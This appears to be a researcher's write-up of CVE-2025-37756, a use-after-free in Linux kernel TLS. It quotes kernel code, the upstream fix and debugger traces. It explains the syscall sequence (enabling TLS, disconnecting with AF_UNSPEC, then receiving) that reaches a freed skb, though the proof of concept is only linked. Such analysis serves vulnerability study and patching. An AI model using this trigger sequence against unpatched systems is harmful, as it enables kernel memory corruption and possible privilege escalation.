Analysis of CVE-2025-37756, an UAF Vulnerability in Linux KTLS

There are several kernelCTF slots targeting the TLS subsystem. Since I had previously reviewed KTLS during my kernelCTF research on lts-6.6.71 and found nothing, I decided to analyze them and write this post as my side notes.

The patch commit of this vulnerability can be found here, and it was fixed in LTS 6.6.88.

1. TLS Initialization

Through the SYS_setsockopt system call with the TCP_ULP socket option, an already-connected TCP socket can be configured to use an Upper Layer Protocol (ULP). One of the supported ULPs enabled by default is TLS.

During the initialization of TLS, the proto [1] and proto_ops [2] fields of the TCP socket are updated to point to TLS-specific handlers.

static int tls_init(struct sock *sk)
{
    struct tls_context *ctx;
    int rc = 0;

    update_sk_prot(sk, ctx); // <--------------
    // [...]
}

void update_sk_prot(struct sock *sk, struct tls_context *ctx)
{
    int ip_ver = sk->sk_family == AF_INET6 ? TLSV6 : TLSV4;

    WRITE_ONCE(sk->sk_prot, // [1]
           &tls_prots[ip_ver][ctx->tx_conf][ctx->rx_conf]);
    WRITE_ONCE(sk->sk_socket->ops, // [2]
           &tls_proto_ops[ip_ver][ctx->tx_conf][ctx->rx_conf]);
}

After TLS is enabled, encryption parameters must be configured for both transmission and reception via the TLS_TX and TLS_RX options.

When setting up the receive path (TLS_RX), the kernel eventually calls tls_strp_init() [3], which allocates an anchor skb object. This skb is not used to store data; instead, it serves as a marker for TLS records and will be referenced when processing incoming packets.

static int do_tls_setsockopt(struct sock *sk, int optname, sockptr_t optval,
                 unsigned int optlen)
{
    // [...]
    switch (optname) {
    case TLS_TX:
    case TLS_RX:
        lock_sock(sk);
        rc = do_tls_setsockopt_conf(sk, optval, optlen, // <--------------
                        optname == TLS_TX);
        release_sock(sk);
        break;
    }
    // [...]
}

static int do_tls_setsockopt_conf(struct sock *sk, sockptr_t optval,
                  unsigned int optlen, int tx)
{
    struct tls_context *ctx = tls_get_ctx(sk);
    
    // [...]
    if (tx) {
    // [...]
    } else {
        // [...]
        else {
            rc = tls_set_sw_offload(sk, ctx, 0); // <--------------
            // [...]
        }
        // [...]
    }
}

int tls_set_sw_offload(struct sock *sk, struct tls_context *ctx, int tx)
{
    if (tx) {
        // [...]
    } else {
        ctx->priv_ctx_rx = init_ctx_rx(ctx);
        // [...]
        sw_ctx_rx = ctx->priv_ctx_rx;
        // [...]
    }

    if (sw_ctx_rx) {
        rc = tls_strp_init(&sw_ctx_rx->strp, sk); // [3]
    }
}

int tls_strp_init(struct tls_strparser *strp, struct sock *sk)
{
    // [...]
    strp->sk = sk;
    strp->anchor = alloc_skb(0, GFP_KERNEL);
    // [...]
    return 0;
}

2. Packet Reception

When a device receives a packet, it is passed to the TLS receive handler, tls_strp_read_sock(), for processing.

#0  tls_strp_read_sock
#1  tls_strp_check_rcv
#2  tls_data_ready
#3  tcp_data_queue
#4  tcp_rcv_established
#5  tcp_v4_do_rcv
#6  tcp_v4_rcv
#7  ip_protocol_deliver_rcu
#8  ip_local_deliver_finish
#9  __netif_receive_skb_one_core
#10 __netif_receive_skb
#11 process_backlog
#12 __napi_poll
#13 napi_poll
#14 net_rx_action
#15 handle_softirqs
#16 do_softirq

The implementation of tls_strp_read_sock() is somewhat complex, so I’ve added inline comments to explain what each function call does. If the incoming data belongs to the first packet of a TLS record, the function will call tls_strp_load_anchor_with_queue() [1].

static int tls_strp_read_sock(struct tls_strparser *strp)
{
    int sz, inq;

    inq = tcp_inq(strp->sk); // total unread packet data length
    if (inq < 1)
        return 0;

    // [...]
    if (inq < strp->stm.full_len) // strp->stm.full_len defaults to 0, means no data
        return tls_strp_read_copy(strp, true);

    if (!strp->stm.full_len) {
        // the first packet in the record is used as the anchor
        tls_strp_load_anchor_with_queue(strp, inq); // [1]

        // extract TLS record size from the header
        sz = tls_rx_msg_size(strp, strp->anchor);
        
        // [...]
        // set the total expected length of TLS record
        strp->stm.full_len = sz;

        if (!strp->stm.full_len || inq < strp->stm.full_len)
            // not all data has been received yet
            return tls_strp_read_copy(strp, true); // decide whether to copy partial data
    }

    // [...]
    WRITE_ONCE(strp->msg_ready, 1); // a complete TLS record is ready
    tls_rx_msg_ready(strp);

    return 0;
}

The function tls_strp_load_anchor_with_queue() retrieves the first skb object [2] from the TCP receive queue and attaches it as a fragment list [3] to the anchor skb.

static void tls_strp_load_anchor_with_queue(struct tls_strparser *strp, int len)
{
    struct tcp_sock *tp = tcp_sk(strp->sk);
    struct sk_buff *first;
    u32 offset;

    first = tcp_recv_skb(strp->sk, tp->copied_seq, &offset); // [2]

    // [...]
    strp->anchor->len = offset + len;
    strp->anchor->data_len = offset + len;
    strp->anchor->truesize = offset + len;

    skb_shinfo(strp->anchor)->frag_list = first; // [3]
    // [...]
}

It is important to note that tcp_recv_skb() peeks at the skb object from the receive queue [4] without updating its reference count (skb->users). This means TLS does not actually own this skb object — it is only borrowing it.

struct sk_buff *tcp_recv_skb(struct sock *sk, u32 seq, u32 *off)
{
    while ((skb = skb_peek(&sk->sk_receive_queue) /* [4] */) != NULL) {
        // [...]
        if (offset < skb->len || (TCP_SKB_CB(skb)->tcp_flags & TCPHDR_FIN)) {
            *off = offset;
            return skb;
        }
    }
}

3. Disconnection & Root Cause

In Linux, calling the SYS_connect system call on an already-connected TCP socket with the network family set to AF_UNSPEC will actively disconnect the current connection [1] 🤯.

const struct proto_ops inet_stream_ops = {
    .family = PF_INET,
    // [...]
    .connect = inet_stream_connect, // <------------
    // [...]
};

int inet_stream_connect(struct socket *sock, struct sockaddr *uaddr,
            int addr_len, int flags)
{
    int err;

    lock_sock(sock->sk);
    err = __inet_stream_connect(sock, uaddr, addr_len, flags, 0); // <------------
    release_sock(sock->sk);
    return err;
}

int __inet_stream_connect(struct socket *sock, struct sockaddr *uaddr,
              int addr_len, int flags, int is_sendmsg)
{
    if (uaddr) {
        // [...]
        if (uaddr->sa_family == AF_UNSPEC) {
            sk->sk_disconnects++;
            err = sk->sk_prot->disconnect(sk, flags); // internally set sk->sk_err to 0x68
            sock->state = err ? SS_DISCONNECTING : SS_UNCONNECTED; // [1]
            goto out;
        }
    }
}

However, even though the socket state is updated to SS_UNCONNECTED, the socket fops are not reverted and continue to point to the TLS handlers. In addition, the TLS resources are not released by the TCP disconnect handler. Together, these inconsistencies form the root cause of the vulnerability.

As noted in the maintainer’s commit, fully supporting TLS disconnection is hard. Instead, the fix introduces a dedicated disconnect handler that simply disallows disconnects on TLS sockets.

+static int tls_disconnect(struct sock *sk, int flags)
+{
+    return -EOPNOTSUPP;
+}

static void build_protos(struct proto prot[TLS_NUM_CONFIG][TLS_NUM_CONFIG],
             const struct proto *base)
{
    prot[TLS_BASE][TLS_BASE] = *base;
    prot[TLS_BASE][TLS_BASE].setsockopt    = tls_setsockopt;
    prot[TLS_BASE][TLS_BASE].getsockopt    = tls_getsockopt;
+   prot[TLS_BASE][TLS_BASE].disconnect    = tls_disconnect;
    prot[TLS_BASE][TLS_BASE].close        = tls_sk_proto_close;
}

4. Vulnerability Trigger

So what happens if a TLS socket is forced to disconnect? Since no disconnect handler was originally defined, triggering a disconnect will fall back to the TCP disconnect handler tcp_disconnect().

pwndbg> p sk->__sk_common.skc_prot->disconnect
$1 = (int (*)(struct sock *, int)) 0xffffffff822163e0 <tcp_disconnect>

During the execution of tcp_disconnect(), the kernel attempts to release all skb objects from the receive queue [1].

int tcp_disconnect(struct sock *sk, int flags)
{
    // [...]
    __skb_queue_purge(&sk->sk_receive_queue); // [1]
    // [...]
}

Internally, __skb_queue_purge() calls __kfree_skb() on each skb in the queue, decrementing their reference counts, and freeing them once the refcount reaches zero.

#0  __kfree_skb
#1  kfree_skb_reason
#2  __skb_queue_purge_reason
#3  __skb_queue_purge
#4  tcp_disconnect

The problem arises because the TLS receive handler stores the first skb from the TCP receive queue [2] as part of its internal state, but without updating its reference count. As a result, after tcp_disconnect() frees the queue, the TLS ->frag_list pointer ends up referencing a freed skb object.

static void tls_strp_load_anchor_with_queue(struct tls_strparser *strp, int len)
{
    // [...]
    first = tcp_recv_skb(strp->sk, tp->copied_seq, &offset);
    // [...]
    skb_shinfo(strp->anchor)->frag_list = first; // [2]
    // [...]
}

Later, if a system call such as SYS_recvfrom is made on this disconnected TLS socket, the handler tls_sw_recvmsg() is invoked. Deep inside, while converting skb data into a scatterlist, the kernel traverses the fragment list [3]. At this point, it dereferences the previously freed skb [4], leading to a UAF condition.

int tls_sw_recvmsg(struct sock *sk,
           struct msghdr *msg,
           size_t len,
           int flags,
           int *addr_len)
{
    // [...]
    while (len && (decrypted + copied < target || tls_strp_msg_ready(ctx))) {
        // [...]
        err = tls_rx_one_record(sk, msg, &darg);
        // [...]
    }
}

static int tls_rx_one_record(struct sock *sk, struct msghdr *msg,
                 struct tls_decrypt_arg *darg)
{
    // [...]
    err = tls_decrypt_sw(sk, tls_ctx, msg, darg);
    // [...]
}

static int
tls_decrypt_sw(struct sock *sk, struct tls_context *tls_ctx,
           struct msghdr *msg, struct tls_decrypt_arg *darg)
{
    // [...]
    err = tls_decrypt_sg(sk, &msg->msg_iter, NULL, darg); // <--------------
    // [...]
}

static int tls_decrypt_sg(struct sock *sk, struct iov_iter *out_iov,
              struct scatterlist *out_sg,
              struct tls_decrypt_arg *darg)
{
    struct sk_buff *skb = tls_strp_msg(ctx); // ctx->strp.anchor

    // [...]
    err = skb_to_sgvec(skb, &sgin[1], // <--------------
               rxm->offset + prot->prepend_size,
               rxm->full_len - prot->prepend_size);
}

int skb_to_sgvec(struct sk_buff *skb, struct scatterlist *sg, int offset, int len)
{
    // [...]

    skb_walk_frags(skb, frag_iter) { // [3]
        int end, ret;
    
        // [...]
        end = start + frag_iter->len; // [4]
        if ((copy = end - offset) > 0) {
            // [...]
            ret = __skb_to_sgvec(frag_iter, sg+elt, offset - start,
                          copy, recursion_level + 1);
            if (unlikely(ret < 0))
                return ret;
            elt += ret;
            if ((len -= copy) == 0)
                return elt;
            offset += copy;
        }
        start = end;
    }
    BUG_ON(len);
}

#define skb_walk_frags(skb, iter) \
    for (iter = skb_shinfo(skb)->frag_list; iter; iter = iter->next)

You can find the poc here.

5. Others

During debugging, I observed that when data is sent separately, it can still end up being stored in the same skb object. This process is called coalescing. The corresponding call trace is shown below:

#0  skb_try_coalesce
#1  tcp_try_coalesce
#2  tcp_queue_rcv
#3  tcp_rcv_established
#4  tcp_v4_do_rcv
#5  tcp_v4_rcv

Under certain conditions, coalescing attempts to merge adjacent and compatible skb objects instead of allocating a new skb.